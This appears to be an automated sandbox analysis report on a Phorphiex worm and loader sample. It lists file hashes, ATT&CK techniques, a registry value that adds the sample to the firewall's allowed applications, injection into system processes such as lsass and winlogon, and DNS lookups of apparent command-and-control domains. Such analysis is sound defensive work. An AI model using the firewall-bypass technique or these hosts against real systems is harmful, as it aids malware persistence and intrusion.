phorphiex | dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18/12/2024, 23:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
Size

37KB
MD5

635a58029ce832a74876c3ffec0c3acf
SHA1

bb00046e17cb65703a4435d6e30df21d7a185159
SHA256

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764
SHA512

50186fa0f438b2d74716df89374b6f2106b7ec6d600ed62dd45bd7c6fd8875150e794d329dcebb755dc30bd21c386dd792d8fa6d3868408e26eb66142c43c7b0
SSDEEP

768:lRrgLWAeXOMhbcqnLPsJLWRvdgLoeSxLNLDWVTv4bBOaec8LPXa:3GeXOFqn7Qevd3e+taz4fec8zK

Score

10^/10

phorphiex discovery evasion loader trojan worm

Malware Config

Signatures

Modifies firewall policy service 3 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Local\Temp\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe:*:enabled:@shell32.dll,-1"	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Phorphiex family
phorphiex

Phorphiex payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000300000001e5b4-11.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1340	4740	WerFault.exe	84

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 620	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	5
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 680	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	7
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 788	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	8
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 792	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	9
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 804	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	10
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 912	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	11
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 964	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	12
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 376	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	13
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 512	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	14
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 424	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	15
PID 4740 wrote to memory of 1056	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	16
PID 4740 wrote to memory of 1056	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	16
PID 4740 wrote to memory of 1056	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	16
PID 4740 wrote to memory of 1056	4740	dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe	16

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:620
- C:\Windows\system32\fontdrvhost.exe
  "fontdrvhost.exe"
  2⤵
  PID:788
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:376

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
1⤵
PID:792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:804
- C:\Windows\system32\wbem\unsecapp.exe
  C:\Windows\system32\wbem\unsecapp.exe -Embedding
  2⤵
  PID:3172
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  2⤵
  PID:3844
- C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
  2⤵
  PID:3940
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:4008
- C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
  2⤵
  PID:1040
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:3512
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:2292
- C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  2⤵
  PID:2940
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  2⤵
  PID:1924
- C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
  2⤵
  PID:4764
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:1220
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:2496
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:424

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1136

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1180
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2808
- C:\Windows\system32\MusNotification.exe
  C:\Windows\system32\MusNotification.exe
  2⤵
  PID:4968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1444
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:1316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2144

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2776

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2852

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3408

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3472
- C:\Users\Admin\AppData\Local\Temp\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe
  "C:\Users\Admin\AppData\Local\Temp\dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe"
  2⤵
  - Modifies firewall policy service
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4740
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 1756
    3⤵
    - Program crash
    PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3240

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:3520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3144

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4740 -ip 4740
1⤵
PID:4400

Network

DNS

ilo.brenz.pl

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Remote address:

8.8.8.8:53

Request

ilo.brenz.pl

IN A

Response
DNS

ant.trenz.pl

dff97ccdcd4842d8690b0530e0b98643a0c6b84a3b2aa30222784b807642a764.exe

Remote address:

8.8.8.8:53

Request

ant.trenz.pl

IN A

Response
DNS

228.249.119.40.in-addr.arpa

Dnscache

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

181.129.81.91.in-addr.arpa

Dnscache

